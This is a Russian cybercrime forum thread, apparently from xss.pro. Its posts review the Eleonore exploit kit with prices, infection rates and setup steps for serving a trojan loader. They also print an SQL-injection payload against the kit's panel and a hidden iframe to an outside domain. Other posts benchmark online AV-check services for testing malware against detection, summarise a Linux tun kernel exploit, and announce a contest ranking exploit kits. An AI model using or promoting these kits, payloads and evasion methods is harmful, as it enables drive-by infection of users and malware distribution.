Текст из обоих файлов был загружен в TexMaker, далее была выполнена полная разметка LaTeX (абзацы, исходники, таблицы) и получен pdf файл, прикрепленный к данному сообщению. Также были исправлены все найденные опечатки.

Прошу в этой теме сообщать о всех неточностях и косяках - изменения воспоследуют.
 
Уязвимость в ядре Linux позволяет получить повышенные привилегии (драйвер net/tun)

180px-Tux.svg.png
Автор проекта grsecurity, Brad Spengler, опубликовал эксплойт, использующий очень интересную уязвимость в ядре Linux (драйвер net/tun).

Специфика этой уязвимости состоит в том, что уязвимость отсутствует в исходном коде, но присутствует в бинарном. Как такое возможно? Давайте рассмотрим это на примере. Все начинается с того, что происходит инициализация указателя sk:
Код:
struct sock *sk = tun->sk;
Этот код не вызывает ошибок даже если tun == NULL, и не является сам по себе уязвимостью.

Несколькими строками ниже происходит проверка инициализации указателя tun:
Код:
if (!tun)
return POLLERR;
Казалось бы, теперь все правильно. Злодей не пройдет.

Но! При сборке кода компилятор полагает, что указатель tun уже корректно инициализирован и, оптимизируя код, выкидывает проверку факта инициализации (приведенный выше оператор if). Таким образом, ничто не мешает злоумышленнику заставить ядро обращаться по нулевому адресу. Имеем классическую null pointer dereference vulnerability.

Обнаруженная уязвимость позволяет злоумышленнику обойти ограничения SELinux/AppArmor, вызвать крах ядра либо выполнить произвольный код с рутовыми привилегиями.

Представленный сплойт протестирован на ядрах версий 2.6.30 с SELinux и без, а также на 2.6.18 (RHEL5, собирать с опцией -DRHEL5_SUCKS). Для успешной работы данного сплойта необходимо наличие на машине PulseAudio и подгруженного модуля tun.

Описание уязвимости | Скачать эксплоит
 
logonil.jpg


Приятного времени суток уважаемые читатели DL.
Сегодня я вновь выхожу на связь с обзором связки, посетившей наш рынок.

Итак знакомьтесь Eleonore Exp v1.0

-----------------------------=====Описание=====----------------------------
Описание от автора: ссылка

Ключевые моменты:

В состав связки входят следующие эксплойты:
> MDAC
> MS009-02
> SnapShot
> Telnet - for opera
> PDF collab.getIcon
> PDF Util.Printf
> PDF collab.collectEmailInfo
> DirectX DirectShow

Средний пробив на связке:
> на ру-снг траффе: 10-30%
> на уса траффе: 5-15%
* Пробив указывается приблизительный, может отличаться и зависит напрямую от вида и качества траффика.

Цены:
> Стоимость самой связки = 599$
> Чистки от АВ = 49$
> ребилд на другой домен = 69$
* Связка с привязкой к домену.

-----------------------------=====Установка=====----------------------------
Итак поехали.
Получаю от автора связку. Размер в распакованном виде 1,4 Мб. Рис.1
README в комплекте нету. Действуем методом научного тыка.
Создаем базу данных на хостинге (utf8), вносим данные в файл config.php Рис.2
Заливаем содержимое папки на сервак. Запускаем install.php
В случае успеха видим надпись "Installation finished Please delete install.php" Рис.3
Заливаем на хост свой супер-мега трой/лоадер под именем load.exe (можно имя менять в config.php)


-----------------------------=====Тесты=====----------------------------
Первый тест на мое трафе. Ифрэйм, бизнес-эду тематики с преобладанием US
Трафика 829, загрузок 48, средний процент пробива 5,46% Рис.4 Рис.5 Рис.6

Второй тест на трафе продавца. Ифрэйм, адалт тематики, с преобладанием US
Трафика 1702, загрузок 88, процент пробива 5.17% Рис.7 Рис.8 Рис.9

30 июля я получил от автора обновление связки.
Changelog:
* Убран Snapshot
* Добавлен Spreadsheet, эксплойт для IE при установленном офисе.
* Добавлена возможность загрузки файла через админку.
* переделан пдф.

Ставим апгрэйд. Смотрим в админку:
1. Появилась новая закладочка, позволяющая грузить файлы на хост непосредственно через админку.
2. Появилась возможность грузить файл с удаленного хоста.

Рис. обновения

Третий и четвертый тесты проводились уже на обновленной связке.
Траф идентичен второму тесту, т.е. ифрэйм, адалт тематики, с преобладанием US
Трафика 835, загрузок 81, процент пробива 9,70% Рис.10 Рис.11 Рис.12 Рис.13
Как видим, налицо улучшение пробива.

Четвертый тест, для закрепления результата проводился на покупном ифрэйм трафике. MIX с преобладанием US DE GB TR IT.
Трафика 2404, загрузок 434, процент пробива 18,05% Рис.14 Рис.15 Рис.16 Рис.17
Отстук с лоадера составил 77,6%.

Во всех четырех тестах Elite Loader грузился. Отстук файла составлял приблизительно 70-85%


-----------------------------=====Анализ кода от DeusTirael=====----------------------------

На обзор было представлено 2 версии связки. Как я понял 1.0 и 1.2

Админка - только самое необходимое, дизайн приятный, интерфейс понятный.
Замечены какие-то левые копирайты в cascade style sheet.
Авторизация написана через ж. Толи это такая задумка, толи криворукость автора.
Вобщем от auth bypass при передаче в запросе ?auth_check=ok спасает только Fatal error, возникающая в 40й строке
т.к. не определена функция geoip которая находится в файле подключаемом инклудом в 10й строке.
Но почему подключается именно в 10 строке а не перед самим использованием geoip базы я так и не понял.

getexe.php, как несложно понять из названия скрипт выдает exe, записывая в базу что уник с данным ip пробился.
Смотрим запрос к базе $q = mysql_query("update statistic set good=1, spl='".$spl."' where ip='".$ip."'");
Смотрим откуда береться $spl
if (isset($_GET['spl'])) $spl = $_GET['spl'];
elseif (isset($_POST['spl'])) $spl = $_POST['spl'];
else $spl="--";
Не фильтруется сталобыть. Значит можем передать привет админу и повысить пробив до 100% нопремер. Максимальная длина привета 30 символов.
getexe.php?spl=PREVED%20ODMEN,%20KLASSNIY%20SPLOENT'%20where%201/*
Рис. пример

Эксплойты - чегото сверхнового нет, все как у всех.
Присутствует небольшая обфускация переменных на лету, что совместно с криптором уменьшает риск спалиться.
Криптор не палится. Сложность расшифровки средняя.
Заметно что автор как минимум не профессионал. В частности по комментариям в коде эксплойтов:
// Mozilla Firefox <= 3.5.0 просмотреть эксп, проверить на версиях 2.х, 3х
// <= SWF 9 временно отключен скорее всего следует убрать его
// <= opera telnet 9.25
Насчет opera telnet 9.25... Уже устал повторять что opera telnet бьет версии 9.0-9.19 и первые бетки 9.20

В версии 1.2
Комментариев в коде эксплойтов нет, видимо автор уже разобрался что к чему.
В файле 404.php находится левый фрейм
<iframe src="http://ef2tr.cn/index.html" width="1" height="1" style="display:none;"></iframe>
По сравнению с версией 1 изменен код пдф эксплойта и некоторых других.
Эксплойты срабатывают. Валящих браузер эксплойтов не много.
При этом учтите что браузер падает только когда пробивается подобным эксплойтом,
это не так часто происходит, так что за живучесть трафика беспокоиться сильно не стоит.
 
hb_first_pc_virus_1.jpg


Доброго времени суток уважаемые форумчане. Сегодня я выхожу на связь с обзором абсолютно несвойственной мне тематики.
Сегодня мы будем читать про онлайн сервисы антивирусных проверок. Сразу сообщу вам что в тесте были как платные так и бесплатные сервисы.

Перечень:
Платные сервисы:
avcheck.ru
avcheck.biz
av-check.com
virtest.com

Бесплатные сервисы:
virustotal.com
www.novirusthanks.org
virusscan.jotti.org/ru
scanner.virus.org
virscan.org

Будем сравнивать:
1. количество ав
2. качество скана exe
3. информативность этого самого скана
4. наличие возможности скана выдачи связок
5. информативность выдачи по связкам
6. нагрузка на сервер (которая показывается каждому из пользователей)
7. скорость проверки
8. Возможность посмотреть лог проверки другому человеку.

Данный обзор инициирован Одиноким Волком (спасибо ему за идею).


--------========Количество АВ, отправка результатов АВ компаниям========--------
Платные сервисы:
avcheck.ru - 17, Проверяемые файлы никуда не отправляются. (Политика сервиса)
avcheck.biz - 17, Проверяемые файлы никуда не отправляются. (Политика сервиса)
av-check.com - 22, Проверяемые файлы никуда не отправляются. (Политика сервиса)
virtest.com - 26, Проверяемые файлы никуда не отправляются. (Политика сервиса)

Бесплатные сервисы:
virustotal.com - 40 (файлы отправляются АВ, прописано в правилах)
www.novirusthanks.org - 22 (Есть галочка Do not distribute the sample)
virusscan.jotti.org/ru - 21 (никаких галочек не обнаружено)
scanner.virus.org - 22 (считал вручную... Ну что сложно было в тексте написать количество АВ на борту? :( ) (Присутствует галочка Do Not Distribute to Anti Virus Companies)
virscan.org - 38 (-//- Огромные минусы за неинформативность)


--------========Проверка exe========--------
Специально для данного теста Silvert написал для меня небольшой экзешничек на асме.
Код:
format PE GUI 4.0

include '%fasminc%\win32a.inc'

entry __zMain


section '.text' code readable executable

__zMain:
	push	ebp
	mov	ebp, esp
	invoke	MessageBoxA, NULL, __url, NULL, NULL
	leave
	ret

section '.data' data readable
__url	db	'http://testeng.com/yo.exe',0
section '.idata' data readable writable executable
data import
     library	user32, 'user32.dll'
    ;
     import	user32, MessageBoxA, 'MessageBoxA'
end data

Суть этого файла заключалась в том, что не являясь вирусом он содержит процедуры детектируемые несколькими антивирусами. Притом эти функции палятся только при включении эвристика. Таким образом, если сервис откровенно халявит и проверяет только по сигнатурам, данный файл детектиться не будет.

Платные сервисы:
avcheck.ru - 4/17 Обнаружили: Authentium, Avira, F-Prot, Norman. Лог проверки найти не удалось. Стоимость 1$ - 1 проверка (В дебрях нашел ссылку на лог проверки, но западло в том, что для ее просмотра нужно быть автором этой самой проверки (посмотреть лог без моих куков не удалось) Лог) Рис.1
avcheck.biz - 2/17 Обнаружили: F-Prot, Avira. Лог проверки найти не удалось, кроме того смутило то, что F-Prot показал совершенно другие данные нежели во всех предыдущих проверках, кроме того не среагировл Norman. Стоимость скана exe - 20 центов Рис.2
av-check.com - 3/22 Обнаружили: Avira Antivir, F-Prot, Ikarus. Почему-то не сработал Norman, McAfee, A-Squared, Panda Antivirus!!! Стоимость 1$=1проверка. Лог проверки Рис.3
virtest.com - 6/26 Обнаружили: IKARUS, F-Prot, A-Squared, Avira, SAV, Norman. Присутствует ссылка на лог сканирования Рис.4

Бесплатные сервисы:
virustotal.com - 11/41 Обнаружили: a-squared, AntiVir, Authentium, eSafe, F-Prot, Ikarus, McAfee+Artemis, McAfee-GW-Edition, Norman, Panda, Sunbelt (лога сканирования нет) Рис.5
www.novirusthanks.org - Провериться с первого раза не удалось. Сервис мертвый. Повторный заход принес следующий результат: 5/22 a-squared, Avira AntiVir, F-PROT6, Norman (лог сканирования найти не удалось) Рис.6
virusscan.jotti.org/ru - 5/21 a-squared, Antivir, F-Prot, Ikarus, Norman (Лог сканирования) Рис.7
scanner.virus.org - В процессе проверки завис намертво. Никакие припарки не помогали. Рис.8
virscan.org - В процессе проверки выскакивали сообщения об обнаружении вируса тем или иным АВ. В результате выдало "Scanner results : Зараженные файлы не обнаружены ни одним из сканеров!" Парадокс. (присутствует возможность просматривать отчеты сканирования сторонними лицами) Рис.9


--------========Время скана exe========--------
Платные сервисы:
avcheck.ru Старт 14:57:15 Стоп 14:58:28 Продолжительность 1:13
avcheck.biz Старт 15:55:55 Стоп 15:58:53 Продолжительность 2:58
av-check.com Старт 16:11:15 Стоп 16:15:25 Продолжительность 4:20
virtest.com Старт 12:53:50 Стоп 12:56:02 Продолжительность 2:12

Бесплатные сервисы:
virustotal.com Старт 11:24:30 Стоп 11:25:40 Продолжительность 1:10
novirusthanks.org Старт 11:29 Вылетел с ошибкой. Старт №2 11:33 Вылетел с ошибкой. Принято решение продолжить тестирование позже. Старт №3 12:04 Стоп 12:05:42 Продолжительность 1:42
virusscan.jotti.org/ru Старт 11:35 Стоп 11:35:22 Продолжительность 22 секунды
scanner.virus.org Старт 11:42:50 Вылетел с ошибкой (We're sorry, but something went wrong. We've been notified about this issue and we'll take a look at it shortly.) Обновил страницу - сканирование продолжилось, но зависло. Повторные попытки просканировать этот или иной файл ни к чему не привели. Выскакивала одна и та же ошибка. Рис.8
virscan.org Старт 11:54:28 Стоп 11:57:14 Продолжительность 2:46


--------========Возможность сканирования архива с файлами========--------
Забрасываю архив с тремя файлами внутри. Исходник + exe используемый в первом тесте + exe используемый в первом тесте модифицированный

Платные сервисы:
avcheck.ru - 15:44-15:45 - результат 4/17. Ложных срабатываний нет, все обнаружено как и в тесте чистого exe, результат выдало суммарный по архиву вцелом. Лог проверки есть, но виден только самому пользователю Рис.10
avcheck.biz - 16:05:45 -16:07:04 - результат 0/17 СЕРВИС НЕ НАШЕЛ НИ ОДНОГО ВИРУСА В АРХИВЕ!!! Рис.11
av-check.com - 16:24:30- - Результат просто убил. "Your Account Type Cannot check archives" А как я догадаться должен был, что на этом сервисе я просто так немогу отсканить архив??? Рис.12
virtest.com - 14:00-14:01:29 - результат 6/26 (Лог сканирования) Рис.13

Бесплатные сервисы:
virustotal.com - 12:38-12:43 - результат 11/41. Ложных срабатываний нет, все обнаружено как и в тесте чистого exe, результат выдало суммарный по архиву вцелом. Рис.14
www.novirusthanks.org - 12:38:20-12:40:37 - результат 5/22. Ложных срабатываний нет, все обнаружено как и в тесте чистого exe, результат выдало суммарный по архиву вцелом. Рис.15
virusscan.jotti.org/ru - 12:43:30-12:44:12 - результат 5/21. Ложных срабатываний нет, все обнаружено как и в тесте чистого exe, результат выдало суммарный по архиву вцелом. Рис.16
scanner.virus.org - 12:45:22- ошибка. Сервис не поднялся после предыдущего теста....
virscan.org - 12:46:15-12:48:30 В процессе тестирования результат показывало 7/38 В финальном результате: "Зараженные файлы не обнаружены ни одним из сканеров!" Убейте меня. Ничего не понимаю в этом сервисе.... Рис.17

По этому тесту хочется особо высказаться. Единственный сервис показавший какой файл в архиве был идентифицирован как вирус и с какими данными - virtest.com Остальные выдавали суммарый результат по архиву. Притом первый попавшийся в процессе скана...

--------========Файловая бомба========--------
Для этого теста мне была предоставлена файловая бомба. И тест проводился с упором на усточивость сервиса к подобного рода татакам.

avcheck.ru - Нулевой баланс на счету. Проверку провести не удалось. Подробности читаем ниже.
avcheck.biz - Старт 17:05 Сервис повис. Проверка остановилась. Смотрим дальше. Главная страница открывается, проверка другого файла вызывает окно с первой проверкой и стоит на месте. Провести проверку другого файла не удалось. Сервис заглючил. При этом он снимает деньги за каждую последующую проверку не проводя ее. Я пытался несколько раз запустить проверку html файла. Деньги со счета списываются, а мне открывается одно и то же окно с зависшей проверкой файловой бомбы. Печально... Рис.18
av-check.com - Не позволяет сканить архивы. Тест провести не удалось.
virtest.com - 10:00 Старт Проверка не запускается. Сервис определил архив как файловую бомбу и выдал об этом информацию. Рис.19

virustotal.com - 11:27 старт 17:34 Стоп. Оезультат: 16/29 Сервис "не подавился". Рис.20
novirusthanks.org - 17:36 Старт. Сервис тут же захлебнулся. Написал "File Uploaded Successfully" и повис намертво. Очухался минут через 4-5. Повторная попытка иных результатов не принесла. Рис.21
virusscan.jotti.org/ru - 17:41 Старт 17:50 стоп. Результат 14/17. Сервис "не подавился". Рис.22
scanner.virus.org - 5 августа 2009 года хост в дайне... Проверку провести не удалось. Рис.23
virscan.org - 17:02 Старт Сервис в процессе проверки потух. Рис.24 Проверка остановилась. Смотрим дальше. Главная страница открывается, проверка другого файла проходит удачно. т.е. сервис захлебнулся частично.

Печально. После этого теста хочется многим как коммерческим так и не коммерческим "сервисам" надавать за такое качество услуг по голове. Взялись за грудь - делайте что-нибудь!!!

--------========Информативность скана========--------
avcheck.ru - низкая. Наравне с бесплатными сервисами.
avcheck.biz - низкая. Наравне с бесплатными сервисами.
av-check.com - низкая. Наравне с бесплатными сервисами.
virtest.com - на высоте. Полные данные от АВ по скану.

Бесплатные сервисы:
virustotal.com - низкая.
www.novirusthanks.org - низкая.
virusscan.jotti.org/ru - низкая.
scanner.virus.org - неизвестно
virscan.org - неизвестно. Результаты сканирования абсолютно противоречивы.

--------========Возможность просканировать урл========--------
avcheck.ru - нет
avcheck.biz - есть
av-check.com - нет
virtest.com - есть

Бесплатные сервисы:
virustotal.com - нет
www.novirusthanks.org - есть
virusscan.jotti.org/ru - нет
scanner.virus.org - нет
virscan.org - нет

--------========Данные по сканированию Iframe========--------
Для этого теста я сохранил главную страницу mail.ru и в конец страницы вписал несколько ифрэймов в разном виде. Как в закодировнном так и в чистом.

avcheck.biz - Спустя сутки на сервисе все так же висит моя зависшая проверка файловой бомбы. Никакие припарки не помогли. Сервис упорно отказывался сканировать что-либо. В репорте так и висит зависшая проверка. Рис.25
virtest.com - Результат 1/26 Сработала Авира. По какой строке - неизвестно. Т.к. урл сканировался как связка (особенности сервиса), на скрине видим, что авира спалила код под всеми браузерами. Кое какая информация присутствует от антивируса. Рис.26
novirusthanks.org - Результат 1/22 Сработала Авира. По какой строке - неизвестно. Результаты скана не говорят об этом ничего. Рис.27

--------========Возможность просканировать связки========--------
Для этого теста была взята связка Neon exploit system. В ней (спасибо DiFor) была выключена опция блокировки неуникальных посетителей.

avcheck.biz - Сервис спустя сутки после пробы файловой бомбы не очухался. Проверить связку не удавалось. Сразу выдавало Something wrong (size=0) Рис.28 Затем опытным путем было выявлено, что до сих пор висит моя проверка файловой бомбы... Рис.29
virtest.com - Результат 17/26 Информативность скана на высоте. Видим данные скана по браузерам, swf и pdf. Рис.30
novirusthanks.org - Результат 10/22 информативность на низком уровне. Определить по какому браузеру/эксплоиту сработал антивирус - абсолютно невозможно. Рис.31

--------========Загрузка сервиса========--------
avcheck.ru - низкая. Сервис сработал довольно быстро.
avcheck.biz - низкая. Сервис сработал довольно быстро.
av-check.com - судя по датчикам загруженности на сайте - маленькая, а судя по времени сканирования - большая. Хотя моя проверка началась сразу же, длилась зато долго...
virtest.com - низкая. Проверка началась сразу же.

Бесплатные сервисы:
virustotal.com - очень большая. При повторном заходе для сбора статистики показывал красное значение и предупреждение о перегрузке сервиса.
www.novirusthanks.org - Очень большая. Сервис часто лагал. Вылетал с ошибками и т.д.
virusscan.jotti.org/ru - Низкая. Сервис отрабатывал очень быстро
scanner.virus.org - Определить не удалось. Сервиз повис в процессе проверки.
virscan.org - Низкая. Показатели загруженности в зеленой зоне.


--------========Отзывы:========--------
avcheck.biz - не порадовал перечнем АВ. Кроме того качество проверки заставляет задуматься. F-Prot - показал нестандартный результат проверки, Norman не сработал вообще. Проверка архива с теми же вирусами показала вообще НУЛЕВОЙ результат. т.е. вирусов не обнаружено!!!
av-check.com - порадовал параллельным сканированием, но ужаснул данными проверки. Не сработали многие АВ. Кроме того, почему-то мне нельзя было сканировать архивы. Ну и последняя ложка дегтя - там даже нет автоматического интерфейса пополнения счета, да и сам аккаунт нужно регистрировать постучав лично саппорту в аську.
avcheck.ru - кинул на деньги. На счет было переведено 5 wmz несколькими переводами. В результате, когда начал делать проверки сделал проверку exe и мне выдало "You have 0 check(s)". Стал гадать какого лешего. Ведь должно было быть 5 проверок. Связались с суппортом.
лог:
22.07.2009 16:19:02
привет. пропали денги с аккаунта

22.07.2009 16:19:12
User: ***********
Expires: 25.07.2009
Hello, ***********! Welcome to our service. You have 0 check(s).

22.07.2009 16:19:18
у меня там 5 баксов было

22.07.2009 16:19:25
Вы добавлены в его(ее) контакт-лист

22.07.2009 16:19:36, 536636 СУППОРТ
у тебя там 5 баксов быть не может, там только проверки

22.07.2009 16:19:48, 536636 СУППОРТ
Ты вот это учитывал:

22.07.2009 16:19:49, 536636 СУППОРТ
Внимание! Все тарифные планы имеют срок действия 1 месяц или 30 календарных дней. Тарифные планы после оплаты замещаются один другим. При желании использовать одновременно несколько тарифов, рекоммендуется открыть дополнительный аккаунт. Во все тарифные планы бесплатно включена отправка отчетов на e-mail и в IM клиент.

22.07.2009 16:20:02, 536636 СУППОРТ
вот тут написано https://avcheck.ru/cgi-bin/index?do=tariffs

22.07.2009 16:20:14
тоесть у меня списались все деньги? О_о

22.07.2009 16:20:26, 536636 СУППОРТ
денег у тебя там не было, там были проверки

22.07.2009 16:20:38
какая разница, монетизация на вашей стороне

22.07.2009 16:20:42
я платил деньги

22.07.2009 16:20:56, 536636 СУППОРТ
стоп, в правилах это указано

22.07.2009 16:20:59, 536636 СУППОРТ
ссылку я тебе дал

22.07.2009 16:21:06, 536636 СУППОРТ
единственное что могу сделать, это накинуть бонус когда будешь новый акк покупать

22.07.2009 16:21:18
ясно

22.07.2009 16:21:22
ненужно ничего

virtest.com - Выражаю владельцу сервиса огромную благодарность за труды. Единственный платный сервис порадовавший и информативностью скана и его скоростью и вообще. После огромного количества времени потраченного на все эти тесты сервисов - этот вызвал самые лучшие впечатления среди платных. Кроме того. Это один из сервисов, который позволяет провести скан только по выбранным АВ. Что позволяет получить результат значительно быстрее чем при скане всей "пачкой".
Ну и напоследок расскажу о новой "фиче", появившейся только сегодня. Сервис стал предлагать услугу проверки вашего домена по 13 базам блек, спамлистов. Поддерживаемые списки: ZeuS domain blocklist, ZeuS IP blocklist, ZeuS Tracker, MalwareDomainList (MDL), Google Safe Browsing (FireFox),McAfee TrustedSource, McAfee SiteAdvisor, PhishTank (Opera, WOT, Yahoo! Mail), hpHosts, SPAMHAUS SBL, SPAMHAUS PBL, SPAMHAUS XBL, MalwareUrl Рис.32
virustotal.com - Лучший сервис по количеству АВ. Огорчает, что сливает инфу производителям. Недостаточная информативность скана. В остальном на высоте.
www.novirusthanks.org - Наверное я зашел в "черный" для этого сервиса день. Много лагал, долго сканился. Недостаточная информативность сканирования. Радует бесплатность данного сервиса и спорная возможность не отсылать проверенный файл АВ компаниям. (По данному сервису было много дебатов на тему отправляет данные АВ или нет. 100% доводов небыло предоставленно. Так что пользоваться рекомендую с опаской. Только в случае крайней необходимости.)
virusscan.jotti.org/ru - Обычный сервис. Малоинформативен в плане выдачи, недостаточно, на мой взгляд АВ. Невозможность проверить связку/iframe.
scanner.virus.org - Качество сервиса просто огорчает. Даже не рекомендую пробовать. В процессе теста повис и при этом на весь день. Качество говорит само за себя. Недостаточно, на мой взгляд АВ.
virscan.org - Количество АВ на уровне, а вот результаты сканирования убийственны. В процессе проверки вирусы обнаружены, а в финальной таблице чистота... Качество сервиса УГ...

p.s. из-зибольшого количества проверок не везде сраду скрины делал. На некоторых скринах отличается время сканирования, но результат тот же.

-----------------------------=====На правах рекламы=====----------------------------
Хочу выразить благодарность за предоставленный хостинг Nonamerz



porno, tds, warez, pharma 50$;
- spyware, adware, malware 80$;
- входящий email спам 100$;
- botnets, exploits, ftp tools, log 80$.

На площадке размещал связку и файл с ифрэймом. Сервису спасибо.

-----------------------------=====Благодарности=====----------------------------
Silvert - написание файла для анализа, Nonamerz (icq 4842805) - хостинг, Одинокий Волк - идея и помощь в подборе правильного, детектируемого ифрэйма, DiFor - участие в обсуждениях кода связок, помог идеей хитрого скана выдачи определенной связки.
Ну и конечно огромная благодарность всем нашим читателям. СПАСИБО что вы с нами!

Записки на полях, специально для xss.pro/

p.s. Если в тексте где-то ошибки - приношу извинения. Старался "добить" материал до своего отпуска.
 
lens23628201231132956co.jpg
Всем авторам связок предлагается принять участие в сравнительном обзоре на звание самой лучшей связки.

Ваши связки будут оцениваться мной (Ar3s) и DeusTirael.
Критерии оценки:
1. Простота установки
2. Функционал
3. Удобство интерфейса
4. Пробив (тесты всех связок пройдут на одинаковом трафике)
5. Отстук (будем сравнивать количество пробитых машин и количество отстучавшихся ботов. Прогружаемый файл для всех связок одинаков.)
6. Качество кода (Проводит DeusTirael. Сравнивается точность подсчета пробитых машин, количество выявленных косяков о коду, будет произведена публикация выявленных косяков, после уведомления о них авторов и пары дней ожидания на их исправление, или рапорта автора о устранении косяка.)
7. Качество крипта. (Virtest)

Для участия в конкурсе вы должны предоставить нам рабочую версию связки, запрещается использование ионкубера или иных подобных обфускаторов. В случае несогласия автора с изучением исходников будут рассматриваться варианты приема на конкурс связок "под обфускатором", но с условием, что никакие действия по изучению кода производиться не будут и об этом будет указано в финальной таблице.
Кроме того, нам потребуется проверить вашу связку на чистоту выдачи. Поэтому участие авторов в данном нюансе приветствуется. Нам никоим образом не хочется самолично вносить изменения в работу системы.

Я гарантирую всем авторам, что кроме меня и DeusTirael ваши детища никто не увидит. Ни исходников, ни систем "в работе". В финальном обзоре будут лишь скриншоты и ссылки на результат АВ проверки.
Так же приветствуется внедрение в тело связки нестандартной переменной, которая будет лишь в выданном мне варианте связки. Дабы вы в случае "утечки" были уверены, что это произошло не по нашей вине.

Последний срок приема заявок - 22 сентября 2009 года.

Любые предложение по данному обзору - приветствуются. Все обсуждения будут абсолютно прозрачны, дабы меня не обвиняли в предвзятом отношении к кому-нибудь.
 
Сегодня президент Дмитрий Медведев подписал указ «О Дне программиста», утвердив 256-й день года в качестве официального праздника. В високосные годы он будет попадать на 12 сентября, в невисокосные — на 13 сентября.

Спразднеком :)

Вообще мне об это рассказали, тем не менее цитата с CNews.ru
День программиста войдет в России в официальный календарь праздников. Соответствующий указ был подписан президентом сегодня, 11 сентября, рассказали CNews в Минкомсвязи. Число 256 (2 в 8 степени) выбрано в качестве «самого программистского» потому, что это количество целых чисел, которое можно выразить с помощью одного восьмиразрядного байта. Кроме того, 256 — это максимальная степень числа 2, которая меньше 365. Наконец, 256 в шестнадцатеричной системе счисления записывается как «100».

Напомним, что указ о праздновании Дня программиста был подготовлен Минкомсвязи и внесен в правительство в июле этого года. Впрочем, еще в конце мая в министерстве не сомневались, что официальный праздник программистов будет утвержден уже в этом году.

Минкомсвязи пошло навстречу пожеланиям отечественных программистов, «учитывая государственную значимость сферы разработки программного обеспечения в повышении качества жизни населения, обеспечении высоких темпов устойчивого экономического роста». В рамках подготовки проекта указа специалистами министерства были проведены консультации с общероссийским объединением профессиональных союзов, а также с отраслевыми ассоциациями АП КИТ и «Руссофт».

Официальным признанием своего профессионального праздника программисты во многом обязаны Валентину Балту, возглавляющему оргкомитет в поддержку Дня программиста — #256. Напомним, что в 2002 г. Балт составил обращение к правительству и организовал сбор подписей в поддержку инициативы. Кроме того, в октябре прошлого года отечественные программисты обратились с аналогичной просьбой и в администрацию президента. Просьбу переадресовали в профильное министерство, которое в итоге и подготовило проект указа.

До сих пор из-за отсутствия точной даты праздника в утвержденном законодателями календаре в разных кругах День программиста отмечали в разные дни. Кто — 19 июля, когда первый программист и дочь Джорджа Байрона Августа Ада Лавлейс написала первую программу, кто — 10 декабря, в день рождения самой Августы, а на Украине со времен FidoNet и вовсе в пятницу 13-го. Днем веб-программистов, в свою очередь, принято считать 4 апреля (4.04), по аналогии с ошибкой 404 («данная страница не найдена»). В качестве еще одной даты для Дня программиста предлагалось 26 июля — в честь предъявления первого в истории обвинения создателю компьютерного вируса. А с сегодняшнего дня праздник официально станет единым для всех.
Страница на Calend.ru.

Требуйте выходной в понедельник)
 
Статус
Закрыто для дальнейших ответов.
Верх